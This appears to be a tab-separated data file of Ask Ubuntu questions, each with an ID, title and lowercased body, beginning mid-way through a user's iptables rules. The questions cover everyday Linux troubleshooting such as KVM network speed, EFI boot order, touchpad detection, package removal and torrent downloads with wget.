tcp -- dport 5500 -j accept -a forward -p tcp -m tcp -- dport 5540 -j accept -a forward -p tcp -m tcp -- dport 5553 -j accept -a forward -p tcp -m tcp -- dport 5557 -j accept -a forward -p tcp -m tcp -- dport 443 -j accept -a forward -p tcp -m tcp -- sport 443 -j accept -a forward -s 192.168.2.0/255.255.255.0 -d 172.0.0.2 -j accept -a forward -s 192.168.3.0/255.255.255.0 -d 172.0.0.2 -j accept -a forward -s 192.168.4.0/255.255.255.0 -d 172.0.0.2 -j accept -a forward -s 192.168.5.0/255.255.255.0 -d 172.0.0.2 -j accept -a forward -s 192.168.6.0/255.255.255.0 -d 172.0.0.2 -j accept -a forward -s 192.168.7.0/255.255.255.0 -d 172.0.0.2 -j accept commit # completed on tue sep 14 11:21:30 2010
253798	linux kvm guests network performance is slower than host	i have a kvm linux based virtual machines , as the network performance of the host is running perfect with 1gb/s ( in internal network ) and using iperf tools it show that the network is running perfect in host , but guests is slow network performance as iperf result was so strange as it is not 100mb/s and is not 1gb/s its range between 350 and 500mb/s maximum , and this is result of using iperf command ( iperf -c servername -p 15 ) [ id ] interval transfer bandwidth [ 17 ] 0.0-10.0 sec 68.6 mbytes 57.5 mbits/sec [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 18.6 mbytes 15.5 mbits/sec [ id ] interval transfer bandwidth [ 5 ] 0.0-10.0 sec 61.9 mbytes 51.9 mbits/sec [ id ] interval transfer bandwidth [ 11 ] 0.0-10.0 sec 16.0 mbytes 13.4 mbits/sec [ id ] interval transfer bandwidth [ 10 ] 0.0-10.0 sec 24.3 mbytes 20.4 mbits/sec [ id ] interval transfer bandwidth [ 15 ] 0.0-10.0 sec 20.2 mbytes 16.9 mbits/sec [ id ] interval transfer bandwidth [ 12 ] 0.0-10.0 sec 30.2 mbytes 25.3 mbits/sec [ id ] interval transfer bandwidth [ 3 ] 0.0-10.0 sec 36.2 mbytes 30.3 mbits/sec [ id ] interval transfer bandwidth [ 8 ] 0.0-10.0 sec 23.6 mbytes 19.8 mbits/sec [ id ] interval transfer bandwidth [ 9 ] 0.0-10.0 sec 24.2 mbytes 20.3 mbits/sec [ id ] interval transfer bandwidth [ 14 ] 0.0-10.0 sec 31.0 mbytes 25.9 mbits/sec [ id ] interval transfer bandwidth [ 7 ] 0.0-10.0 sec 16.6 mbytes 13.9 mbits/sec [ id ] interval transfer bandwidth [ 6 ] 0.0-10.0 sec 18.8 mbytes 15.7 mbits/sec [ id ] interval transfer bandwidth [ 13 ] 0.0-10.0 sec 13.3 mbytes 11.2 mbits/sec [ id ] interval transfer bandwidth [ 16 ] 0.0-10.0 sec 29.6 mbytes 24.8 mbits/sec [ sum ] 0.0-10.0 sec 433 mbytes 363 mbits/sec i tested different network models and the best result was with the virtio model any one please can help to get the full performance of network and be 1 gb/s
253799	gimp crashes ubuntu 12.10 when using pan tool	ubuntu crashes whenever i am using gimp and panning on an image ( spacebar+mouse drag and drop ) this is a very similar issue to gimp crashes ubuntu 12.04 when using tool however this is not related to having a usb scanner plugged in . i have checked the bug fix on launchpad but the xorg patch seems to have been released in july 2012 using gimp with the touchpad avoids having ubuntu crashing and logging out , however gimp still crashes . i have tried launching gimp from the terminal but
253800	replacement for tray icons in 13.04 ?	according to this posting here , 13.04 will finally disable the support for tray icons by taking away the idea of whitelisting applications for tray icon usage . my problem is that i have to use several applications that do n't care about unity ( for example : ibm sametime and lotus notes ; symantec antivirus ) . please note that these are all `` true '' linux versions of the corresponding products . i ca n't say if they are supported officially on ubuntu ; but they run fine ... without using wine for example . so , that wine tray icons still work does n't help these applications . just wondering : is there any back door that i am not aware of ? like , some generic indicator that could be configured to wrap around the no longer supported tray icons ?
253807	jquery in doxygen generated api documentation	i am using doxygen on ubuntu 12.10 to generate api documentation for a c++ library and demon . this works fine with one issue , i can not seem to resolve . doxygen uses jquery in the generated files to e.g . support expanding collapsing elements in the class tree , etc . when building the api documentation , doxygen does copy its ' helper script dynsections.js to the generated api , but it does not copy jquery there . i have tried to install libjs-jquery ( as i assumed doxygen probably missed the dependency ) but that did not really fix the issue . does anyone have a clue for me ? i fear having to manually copy jquery on each build : - (
253810	how to completely remove pure-ftpd-mysql from ubuntu server 12.04.2 ?	i have tried removing pure-ftpd-mysql with the following commands without success : apt-get remove -- purge apt-get autoremove -- purge apt-get purge apt-get clean deborphan -- guess-dev | xargs apt-get -y remove -- purge everytime i run these i get the following and the system hangs : the following packages will be removed pure-ftpd-mysql* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 699 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 89500 files and directories currently installed . ) removing pure-ftpd-mysql ... i then have to tell the system to reboot and then run : dpkg -- configure -a has anyone got any ideas how i can completely remove this package so i can re-install it . even if i try an install -f it gives the same results .
253812	change default shell for terminator	i want to change the default shell of terminator to zsh . in /etc/passwd/ i 've changed the default shell to /bin/zsh . this settings changes the default shell in lxterminal ( the default terminal on lubuntu ) , but not in terminator . so i tried chsh -s /bin/zsh , but that does n't work either . the terminator documentation says : how do i change my default shell ? terminator will always start the shell specified by the shell environment variable . ( it will fall back to /bin/sh if the shell environment variable is n't set . ) you could simply influence terminator 's environment , but the best solution is to tell your operating system which shell you 'd like , and it will ensure that shell is set correctly for all applications , not just terminator . see the documentation for your operating system for details on how to change your default shell . so i expected my attempts to work , but they do n't . how can i change the default shell in terminator .
253813	after rebooting ubuntu from usb , settings not saved	after i started ubuntu 12.04 from usb stick i changed some settings ( display resolution , two monitors , etc ) and made some updates . when i restart my system all new settings are deleted and i get a completly blank system . is it possible to save all the settings to usb or is it necessary to install ubuntu to hdd ?
253814	is there a messenger that can appear offline to some contacts and online to other contacts ?	i am looking for a messenger which lets me choose who i want to appear online to and who i want to appear offline to ( like windows live messenger in windows ) . is there any thing that could do the job in linux ?
253818	manually turn off monitor	can i turn off my laptop monitor manually and instantly with just a click or a simple terminal command ? i just want to turn off my monitor not locking my machine . there is no dedicated turn off monitor button on my machine .
253820	output audio from multiple bluetooth sources simultaneously	i recently discovered the bluetooth capabilities in ubuntu . would it be possible to configure my htpc ( ubuntu 12.10 ) so it would allow pairing multiple bluetooth audio devices ( iphone and 2 windows pcs ) simultaneously in order for it to act as an audio hub . in other words i 'd find it very neat if i could have all my devices output their audio through the htpc to my stereo system in a way that requires no configuration after the initial setup . i 've previously managed to connect my iphone to the htpc and even somehow got it to loop back the sound . it worked just great but after disconnecting the phone there was a loud static that did n't go away until i muted the bt audio source . any ideas how to prevent that ? if multiple simultaneous audio sources is n't possible , i 'll settle for an answer that can guide a novice like me to succesfully set up bt audio loopback without the static for a single device : )
253822	setting plex media server on ubuntu 12.04 desktop ?	i just installed the plex media server from the ubuntu software center , and opened the web interface . i want to stream my video , movies and music to my ps3 . i do lots of scratched and applied same but not working same for me . i am having /home/gaurav/music /home/gaurav/movies /home/gaurav/videos . in plex from web interfaces i added /home/gaurav/music location for music and /home/gaurav/movies for movies . if finds my all movies correctly . but not my all music it only finds 11 songs out of thousand of songs . what i am doing wrong ? . any help would be appreciated . does plex require internet for streaming videos and music to ps3 .
253828	lenses & scopes - is it possible to copy content by clicking on it in the dash ?	i just got an idea to create a lense that would work as a character map . i need character copying very often , and on windows there was a very useful programme ( popchar ) , but on ubuntu i have n't found anything like it . so i thought i could try to build a lense that could copy a single character ( or perhaps a sequence of characters , if possible ? ) by just searching for it in the dash and clicking on it once found . since i 've never done anything similar , i 'm not sure how possible it is to copy certain content by clicking on its visual link in the dash . so , my question is , if i create a lense + scope for copying unicode characters , would it be possible through dash to just copy a character that i click on once i find it ?
253830	gnome-terminal- how do i open a new winodow asking to authentificate as root ?	i have a script that checks for usb devices . if the device is valid , ( it 's in my database , a text file ) my script mounts it , and if the device is not in my database , i get a messgae `` invalid device detected '' , and the device does n't mount . when an invalid device is detected , i want to open a terminal , showing `` invalid device `` usb_name '' detected . please intoduce your root password to mount it . '' . and if the password is correct , and want the _invalid_usb_name to be written in my database , and so , it will be a valid device now . how exactly do i open that terminal in my script asking for my root password ? it 's a bash script .
253831	bridged network in virtualbox	i have just installed oracle vmbox version 4.2.6 & ubuntu 12.04 . am trying to use bridge network connection but for some reasons it is giving me error as : invalid settings detected screenshot : unfortunately even after a host reboot i cant see any adapter name in the dropdown for `` name '' . are there any settings need to be done for that as well ? edit when i tried executing this command : sudo /etc/init.d/vboxdrv setup result : sudo : /etc/init.d/vboxdrv : command not found
253832	webcam logitech c905 control in c++ and opencv	i am trying to change the the resolution of my webcam from inside my c++ program , which apis can i use ? where can i find copy/paste examples ? my webcam works nicely under 12.10 and i can change the resolution using luvcview or other apps . unfortunately when launching my own program opening the camera via opencv the resolution is back to default vga . how can i modify the webcam parameters in my sw or with an separate app so that they will stay ? thx markus
253838	how to download bulk .torrent files ?	i have 2000 links of .torrent files in .txt file in the following format : http : //torrage.com/torrent/57cb57a8d0bc355b28a850ca6707365cbacbbd4c.torrent http : //torrage.com/torrent/22ac2445efcfe1ded424baac35eb122aba4fc0cf.torrent each link is on a newline . i used wget -i /path/to/file_of_torrents.txt . it downloads the files but for some reason no file is able to be used . they are not in right format , perhaps . i do n't know what the problem is with them . but if i paste any link manually in a web browser it downloads perfectly in the right format to be used in a bittorrent client . what is going wrong ? additional information if i open the file in bitorrent client nothing happens bittorent client can not read the file . and if i see the source its encrypted and i dont see it as like a normal torrent file because in normal torrent file it has links of anounce.php and servers but if i download it from wget i can read anything in source here is the example source file downloaded by wget \8b\00\00\00\00\00\00\8d\bbstfѳwl\9b\9d\a4c۶\ed\ce\ff\b1m۶mtl\a7c\dbv : \c6\ed\bd\f7\c1 > g\8cs\ef ] c\ad\97\aa5g\cd\f9\b0 \c0\c9mdcc\eblcl\c2\cc\c2\ed\b0\e3f`pr02\b62q\a0766\a6\98ps22\b1\fc\88h\e1\e8\fe\dfx 3\fb\ff\ca\fde\d8m\e8-\9c\fe\99f\e1\e06wr\fa\f7\bc\9d\f3o\a0\85\f1o'zc [ kf\86\fft\fa\8bd\fb_b\b6v & 6 ? -\9c\9clll\fe \ff\97 '' \f3\ffu̿\8b1\feo\db\a1\fe\c2\f9\bft\fe\bd\b0\ff\a5\c6\fe\ff\b6\88\ff\a9\f9 @ 7 [ \80\b3\e3_ggw\e3*\b2s\b1s\fd ; \f4 ? \97\e1\ea\eajo\ce\c2\f2/ [ \a636\e1\e0\fe\b4\fe\bbz6.n\d5\ed1\c0\d6\d5hk0\9b : \d8z\ff\c7\fe\9b\9b9\ffg\a9\e3ff & \ff\90eb\e46v01r\fak\f9\e9\fe\b7 # \ce\ff ) f\a5 ( \a9h,4rt $ \a6 # 8x\98\d8kx\fct0r\a2\fe { \fei\b2\b0\b5 ! \fc\e5z0\b1\b03\b22s\b0\b3r\99pr\9b\d8\db , l\ccظ\d5t\c5\e98y\b9-llm9\a6 @ : \80\b3\c3 ? \89 @ v.f\c6\ff~m\fe\f3o\8c\b5 \c0\c2\f8\8f \d3\ff\f8l\d8\fe source of same file downloded from web browser d8 : announce23 : udp : //tracker.ccc.de:8013 : announce-listll23 : udp : //tracker.ccc.de:80el26 : udp : //tracker.istole.it:80el37 : http : //tracker.publicbt.com0/announceel35 : udp : //tracker.openbittorrent.com:80el32 : udp : //tracker.ccc.de:80/announceel30 : http : //tracker.ccc.de/announceel38 : udp : //tracker.publicbt.com:80/announceel36 : http : //tracker.publicbt.com/announceel38 : http : //exodus.desync.com:6969/announceel32 : udp : //www.h33t.com:3310/announceee7 : comment59 : torrent downloaded from torrent cache at http : //torrage.com10 : created by37 : rutorrent ( php class - adrien gibrat ) 13 : creation datei1360427649e8 : encoding5 : utf-84 : infod13 : file-durationli4927ei0ei0ei0ei0ee10 : file-mediali0ei-1ei-1ei-1ei-1ee5 : filesld6 : lengthi737021634e4 : pathl26 : s4a-tpb.afk.hdrip.xvid.avieed6 : lengthi4239360e4 : pathl4 : subs26 : s4a-tpb.afk.hdrip.xvid.subeed6 : lengthi40513e4 : pathl4 : subs26 : s4a-tpb.afk.hdrip.xvid.idxeed6 : lengthi4986e4 : pathl26 : s4a-tpb.afk.hdrip.xvid.nfoeed6 : lengthi353e4 : pathl44 : torrent downloaded from extratorrent.com.txteee4 : name27 : tpb.afk.2013.hdrip.xvid-s4a12 : pie
253839	how to copy settings from a live usb ubuntu	my ubuntu 12.10 installation has a big display problem ( `` gnome no effects works '' , but no other desktop option ) , how can i copy the settings from a ubuntu live usb ( that works flawlessly ) ? thanks
253842	fglrx 13.1 weird performance behaviour	recently i installed ubuntu 12.04.1 on my laptop with an ati radeon hd 5450 . the open-source drivers perform well for the desktop environment , but not so with games . i just switched because i thought i would be able to play some simple games with the recent progress in gaming on linux ( steam , hib ... ) . so as steam suggested , i installed ( via steam ) the latest beta drivers . my card was not yet supported . so i installed the main fglrx via jockey . this one also did also not perform well . at last , i updated to ubuntu 12.10 to be sure that i had the latest packages ( xorg and such ) , and then i installed the 13.1 drivers manually according to this guide . the game i measured the performance with is xonotic , a first person shooter . the first time i started it i got > 100 fps , which was equal to the performance on windows . but after loading a second map the framerate got down to 10-30 fps ... after closing the game this was also noticeable in the desktop environment , everything went slow . a reboot does not solve the issue , sometimes i get full performance , and most of the times it 's slow . i already tried customizing options in the catalyst control center , but it does n't make any difference . is there someone out there who also has this problem ? and maybe someone who knows how to solve it too ? : p thanks in advance .
253843	not all updates can be installed , partial upgrade proposed	when i am opening update manager , it writes , that `` not all updates can be installed '' and partial upgrade proposed . what does this mean ? am i correct thinking that `` upgrade '' means changing ubuntu version to higher than mine ? or this is mistype ? i would like not to change os version . simultaneously i had multiple problems with software repositories and keys , which were solved . is this related ?
253844	upgrade 12.04.2 lts to 12.10 do-release-upgrade fails - no new release found	i have just updated to 12.04.2 lts got stuck in a loop for the grub menu so did n't get a clean finish to the upgrade . after reboot everything is running fine welcome to ubuntu 12.04.2 lts ( gnu/linux 3.0.0-17-generic-pae i686 ) * documentation : https//help.ubuntu.com/ new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it . do-release-upgrade checking for a new ubuntu release no new release found my meta-release file shows release as 12.04.1 see below and i wonder if i 'm missing a section for 12.04.2 help would be appreciated extract - links disabled root @ server1 : /var/lib/update-manager # cat meta-release dist : precise name : precise pangolin version : 12.04.1 lts date : thu , 26 apr 2012 12:04:00 utc supported : 1 description : this is the 12.04.1 lts release release-file : http//archive.ubuntu.com/ubuntu/dists/precise/release releasenotes : http//archive.ubuntu.com/ubuntu/dists/precise-updates/main/dist-upgrader-all/current/releaseannouncement releasenoteshtml : http//archive.ubuntu.com/ubuntu/dists/precise-updates/main/dist-upgrader-all/current/releaseannouncement.html upgradetool : http//archive.ubuntu.com/ubuntu/dists/precise-updates/main/dist-upgrader-all/current/precise.tar.gz upgradetoolsignature : http//archive.ubuntu.com/ubuntu/dists/precise-updates/main/dist-upgrader-all/current/precise.tar.gz.gpg dist : quantal name : quantal quetzal version : 12.10 date : thu , 18 oct 2012 12:04:00 utc supported : 1 description : this is the 12.10 release release-file : http//archive.ubuntu.com/ubuntu/dists/quantal/release releasenotes : http//archive.ubuntu.com/ubuntu/dists/quantal-updates/main/dist-upgrader-all/current/releaseannouncement releasenoteshtml : http//archive.ubuntu.com/ubuntu/dists/quantal-updates/main/dist-upgrader-all/current/releaseannouncement.html upgradetool : http//archive.ubuntu.com/ubuntu/dists/quantal-updates/main/dist-upgrader-all/current/quantal.tar.gz upgradetoolsignature : http//archive.ubuntu.com/ubuntu/dists/quantal-updates/main/dist-upgrader-all/current/quantal.tar.gz.gpg root @ server1 : /var/lib/update-manager #
253846	lock terminal and suspend from terminal	i am trying to lock and suspend from the terminal . i tried : pmi action suspend | at now + 1 min and then typed exit but both that and vlock kill the running command . is there a way to lock the terminal and than get the computer to suspend using only terminal commands ?
253847	ubuntu 12.10 w/ kernel 3.7.0.7 and open source driver resume/brightness control	i am using an inspiron 7520 . i got a amd radeon hd 7730m running in switching with an intel 4000 hd . i have updated my open source drivers with xorg edgers and x-swat . i am running on the kernel 3.7 and i am experiencing some problems that i am not having on the kernel 3.5 . i get lower or upper my brightness , it is always stuck to 100 % but i have nearly no brightness . my second issue is that my computer does n't resume , it tells that there 's an error and then it goes all black . also something that never popped me before when i was booting up . it says kvm disabled by bios . thanks for your help . do n't be shy to ask me for any additional details . i have noticed also that even on the kernel 3.5 , i receive an error sometimes when i resume .
253852	how to connect to the qq messenger network ?	iâ´m looking for a version of qq messenger for ubuntu 12.04 . i found a note in wikipedia that there is a beta version of qq for linux , but i could't find it . does anyone know where i can find it ? are there any alternative messenger to use qq ?
253857	asus windows 8 will not let me install ubuntu	i am having difficulties getting ubuntu installed on my laptop and i have tried a few different ways of going about this as suggested on the disk . they include a direct install , install within windows and install helper . none of these worked and i do not like or want windows on my laptop . how can i get rid of windows and get ubuntu to install on my computer ? note : autorun does not work on this laptop for some reason and i am thinking that this may be part of the issue . please help if you can . thank you in advance . ~~~ubuntu install source : disc : ubuntu 10.04 lts desktop edition ~~~laptop computer information : os : windows 8 ( current ) system : 2.7 windows experience index processor : amd c-60 apu with radeon ( tm ) hd graphics 1.00 ghz installed memory ( ram ) : 4.00 ( 3.69 gb useable ) system type : 64-bit operating system , x64-based processor pen and touch : no pen or touch is available for display . ~~~error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000007b info : the application or operating system could n't be ; loaded because a required file is missing or contains errors .
253861	12.04 ubuntu on dell 1405e wifi issue	i feel im pretty good at looking up things and following instructions but linux instructions are always the most incomplete . i am having a similar issue to another post in the forum i found here : 12.04 lts wireless not working in dell insprion e1405 funny thing . i had 11.04 on my system for about a year and decided to wipe and update to 12.04 . did a regular install from a thumb drive and everything went as planned . usually get drivers for my ethernet but not my wireless . wireless drivers are usually found after a full update in the additional drivers section of ubuntu . but this time . after the initial install and system update i lose all my network connectivity . essentially i can not find the drivers to either . i was able to download b43fwcutter and the firmware-b43-installer and b43 ( by itself ) from another computer but still can not get them to install . i can not find information about installing drivers from a local storage ( thumb drive ) . everything is about installing from apt-get which usually requires me being online . i dont really have skill in cli but do it from time to time . can anyone help ? and can anyone guide me to a good book of ubuntu terminal as well as ui so i can fix these issues w/o seeking forum help ? i need to become a buntu guru .
253867	notification 's timeout should also expire when inactive	a script of mine shows notifications via notify-send . when i 'm actively using my system they disappear after some seconds , but when f.i . i 'm not using my mouse or keyboard , or my screen is turned off , the message stays on the screen and is even stacked , because after some time another message is added . is there a certain command for `` notify-send '' to hide its messages even if the system is inactive ? the script looks like this : # ! /bin/bash while : ; do notify-send -i /usr/share/icons/gnome/scalable/emblems/emblem-important-symbolic.svg -- hint int : transient:1 `` $ ( sort -r ~/foo/bar.txt | head -n 1 ) '' sleep 5m done using ubuntu gnome remix 12.10 . thanks in advance !
253870	how to install coffeecup visual site designer software on ubuntu 12.04 or + ?	hello . my question is somewhat important toward the ubuntu . my question is , `` how do you install coffeecups `` visual site designer program '' . i went throught playonlinux method , but it has a complication error in the beginning and after all the installion , it still does not work . is there a certain method of installion method for this certain program . if 's possible can you please describe the method please .
253871	apple magic track pad not working with 12.04.01	i have just now finished installing ubuntu 12.04.01 ( bye-bye windows ... ) . i am trying to get apple magic track pad working with it . i have read several similar questions but no one answered my problem . i believe bluetooth is detecting the trackpad image below i tried toggling the connection button but it again comes back to `` off '' . i also tried resetting trackpad by pressing the power button . please suggest .
253872	measuring and documenting internet speed ( download and upload )	i 'm looking for a way to document ever couple of minutes the download and upload speed the is supplied to me by the isp . there are many tools to show the current upload and download speed ( that are being used ) but i need to document what the isp gives me ( i suspect that i do n't get the speed i pay for during the day ) . i guess it would be measured against a specific url i should supply . do you know any tool like that ?
253880	can i change the color of tabs in gedit ?	under xfce 4 ( xubuntu 4.8 ) the tabs of gedit appear black with dark grey writing ( at least on my pc it does ) . obviously this makes it pretty hard reading the file names that are open . changing the color in the gedit-settings only changes the font and background color of the document . changing the general settings for windows ' appearance has n't helped either . any suggestions are welcome ! preferably none that take long to implement as i 'm just familiarizing myself with xubuntu . thank you !
253887	installation of 12.10 stops at 'configuring hardware '	my problem is very similar to the one described here . i 'm trying to install ubuntu 12.10 64bits from a liveusb drive . before anything i checked the md5sum for the iso file , which was fine . i also checked the usb for errors and no error were detected . ( nb : i am trying to install this as a dual boot with windows 8 , install in efi ) i had problems with the display , so from grub i used the options 'nomodeset ' and 'xforcevesa ' which brings me to the install gui . i start the install and set up all the relevant partitions and the install starts correctly and then stops at this step : ubuntu ubiquity : update-initramfs : generating /boot/initrd.img-3.5.0-17-generic here are the specs of my machine : acer revo l80 cpu : intel core i3-2377m @ 1.50 ghz ram : 8gb graphics : intel hd graphics 3000 i strongly suspect the problem comes from the integrated graphics card not being recognised , but not sure what to do about it ... thanks in advance for any suggestion or fix !
253888	how to add buttons in glade and resize	trying to create the framework for a calculator . i add the window i add the vbox using 2 boxes . 1 for the display , the other for the buttons when i add 1 button it fills the entire panel and i ca n't resize it . in visual basic you can just add a button and resize it , or drag and drop anywhere you want . i just ca n't figure out how to do it here . steep learning curve for me .
253889	how can i configure preseed to use a drive only if it exists ?	some of the machines that i 'm provisioning have a separate /dev/sdb to be used for /home , and some only have a single disk . is there a way i can set up preseed so that if /dev/sdb exists , it uses 100 % of that for /home , but if it does n't , it makes a /home partition on /dev/sda ?
253892	how do i boot to a usb drive ?	i am really new to ubuntu/linux , and i am trying to make a bootable usb drive so i can freely change between oss on my laptop until i am more comfortable with ubuntu . i went to he ubuntu website and followed the instruction for making a bootable usb device . so at this point i have ubuntu installed on my usb but i do not know how to actually boot my computer to the os .
253897	error installing xampp 1.8.1 in ubuntu 12.10	sudo apt-get install xampp after above step the following error is shown reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xampp : i386 : depends : python-gtk2 : i386 but it is not going to be installed depends : python-glade2 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
253901	how to get rid of confusing configuring grub-pc grub install devices	i 've deployed a number of ubuntu machines with clonezilla . after an update they ask the user to install grub on sda or sda1 . i assume it has to do with the hard drive changing as this is a cloned machine . it does n't matter which option is selected but i want to make this screen just not show up . it 's unacceptably difficult for end users to understand and there is no default option , in effect it makes it so users are unable to update their computers without it assistance . does anyone know how to do such ? i suppose i need to tell grub what hard drive to use ( always sda ! ) but i do n't know how to do this .
253902	efi boot sequence	it seems i somehow kicked out my 'diskdrive boot-option ' for my blueray-diskdrive . i tried to fix it with 'efibootmgr ' but i 'm not getting anywhere . i think i just do n't understand how to use this program . here is what efibootmgr tells me about my boot sequence : bootcurrent : 0001 timeout : 0 seconds bootorder : 0001,0000 boot0000* ubuntu boot0001* ubuntu does anybody know how i can add my diskdrive to the sequence ? efibootmgr is giving me the following options : efibootmgr version 0.5.4 usage : efibootmgr [ options ] -a | -- active sets bootnum active -a | -- inactive sets bootnum inactive -b | -- bootnum xxxx modify bootxxxx ( hex ) -b | -- delete-bootnum delete bootnum ( hex ) -c | -- create create new variable bootnum and add to bootorder -d | -- disk disk ( defaults to /dev/sda ) containing loader -e | -- edd [ 1|3|-1 ] force edd 1.0 or 3.0 creation variables , or guess -e | -- device num edd 1.0 device number ( defaults to 0x80 ) -g | -- gpt force disk with invalid pmbr to be treated as gpt -h | -- acpi_hid xxxx set the acpi hid ( used with -i ) -i | -- iface name create a netboot entry for the named interface -l | -- loader name ( defaults to \elilo.efi ) -l | -- label label boot manager display label ( defaults to `` linux '' ) -n | -- bootnext xxxx set bootnext to xxxx ( hex ) -n | -- delete-bootnext delete bootnext -o | -- bootorder xxxx , yyyy , zzzz , ... explicitly set bootorder ( hex ) -o | -- delete-bootorder delete bootorder -p | -- part part ( defaults to 1 ) containing loader -q | -- quiet be quiet | -- test filename do n't write to nvram , write to filename . -t | -- timeout seconds set boot manager timeout waiting for user input . -t | -- delete-timeout delete timeout . -u | -- unicode | -- ucs-2 pass extra args as ucs-2 ( default is ascii ) -u | -- acpi_uid xxxx set the acpi uid ( used with -i ) -v | -- verbose print additional information -v | -- version return version and exit -w | -- write-signature write unique sig to mbr if needed - @ | -- append-binary-args file append extra args from file ( use `` - '' for stdin ) so with ' -- create ' i can create a new boot number . but this will only create another bootnumber for my linux partition . here is what hwinfo tells me about my diskdrive : hardware class : disk model : `` hitachi hts72757 '' vendor : `` hitachi '' device : `` hts72757 '' revision : `` jf4o '' driver : `` ahci '' , `` sd '' driver modules : `` ahci '' device file : /dev/sda device files : /dev/sda , /dev/disk/by-id/ata-hitachi_hts727575a9e364_j3340084huzwhb , /dev/disk/by-id/scsi-sata_hitachi_hts7275_j3340084huzwhb , /dev/disk/by-id/wwn-0x5000cca68cd9e8ba , /dev/disk/by-path/pci-0000:00:1f.2-scsi-0:0:0:0 device number : block 8:0-8:15 bios id : 0x80 drive status : no medium config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 29 ( sata controller ) this is a real problem for me , for i ca n't boot with a live cd now . update : so after a few hours of research google came up with the following results : i tried sudo efibootmgr -- create -- disk /dev/sda -- part 1 -- label `` precise - grub2 '' -- loader \\efi\\ubuntu\\grubx64.efi of course i changed the given variables according to my system . as `` mount '' told me i went on sudo efibootmgr -- create -- disk /dev/sr0 -- part 1 -- label `` blueray '' -- loader \\efi\\ubuntu\\grubx64.efi assuming \\efi\\ubuntu\\grubx64.efi '' links to /boot/efi/efi/ubuntu but i only got back the error could not open disk /dev/sr0 : read-only file system well i guess the attempt to create a bootoption for my disk drive via efibootmgr is the wrong way . the -- create command obviously is trying to write something to the diskdrive . so i tried to tell grub that there is a disk drive : sudo grub-install -- bootloader-id cd-rom /dev/sr0 then sudo reboot i had a bootable disk in my brd-drive ( tried two differend dvds , both bootable on another system of mine ) . before booting up the system from my ubuntu partition the system seemed to check the dvd ( i could hear the drive spinning at startup ) but the ubuntu started as usual from the harddisk . i just checked and saw that my command created this folder : /boot/efi/efi/cd-rom with another `` grubx64.efi '' like the one in /boot/efi/efi/ubuntu i opened up the file with the nano editor but the file seems to be encrypted in a way nano does n't understand ( only jibberish ) here a small excert so you know what i mean : mz�^ @ ^c^ @ ^ @ ^ @ ^d^ @ ^ @ ^ @ ��^ @ ^ @ �^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ $ has anybody an idea how i can restore the bootsequence to a standard value ? or how i can ad the blueray disk drive ?
253903	start nagios web interface on a different port	i am trying to install nagios but i would like to start the web interface on a port other than 80 . i cant seem to find much info on how to do that . any help is appreciated . thanks
253907	failed to open and save monitior configuration	i try to use ubuntu 12.04. from usb with a 4 gb peristent part . first i changed some monitor settings ( have two ) . after rebooting i got the error message : could not apply the stored configuration for monitors . failed to open file '/home/ubuntu/.config/monitors.xml.xml ' : input/output error after this i changed the settings again . after pressing the save button i got following error . could not save the monitor configuration . failed to create file '/home/ubuntu/.config/monitors.xml.eo8asw ' : invalid argument i found some questions with the same problem . the answer is to delete the monitors.xml file . but i can not find the .config folder in the ubuntu folder . how can i edit/delete the monitors.xml file , or how can i create a new one ?
253910	does kwin have a d-bus api ?	does kwin have a d-bus api ( get windows list , move windows , etc ) ? if yes , where can i find the api reference ?
253914	touchpad recognised as usb optical mouse	i installed ubuntu 12.10 on a dell vostro 1710 ( yes , this is old hardware ; - ) . everything works great except for the touchpad ! ( wifi see here ) the touchpad does n't work at all , and is recognised as `` usb optical mouse '' : vostro1710 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ integrated webcam id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] vostro1710 : ~ $ cat /proc/bus/input/devices i : bus=0003 vendor=15d9 product=0a4d version=0111 n : name= '' usb optical mouse '' p : phys=usb-0000:00:1d.1-2/input0 s : sysfs=/devices/pci0000:00/0000:00:1d.1/usb6/6-2/6-2:1.0/input/input11 u : uniq= h : handlers=mouse0 event5 b : prop=0 b : ev=17 b : key=70000 0 0 0 0 b : rel=103 b : msc=10 i followed logging instructions on this page , so you can read my evtest as well as my xorg.0.log . thanks folks !
253918	ruby ide in ubuntu	could you people help me by saying a good ruby compatible ide in ubuntu and its installation and settings with ruby environment ? i really need that one . i do n't want rails version , only ruby 1.9.3 . i could not find from the software center also . thanks
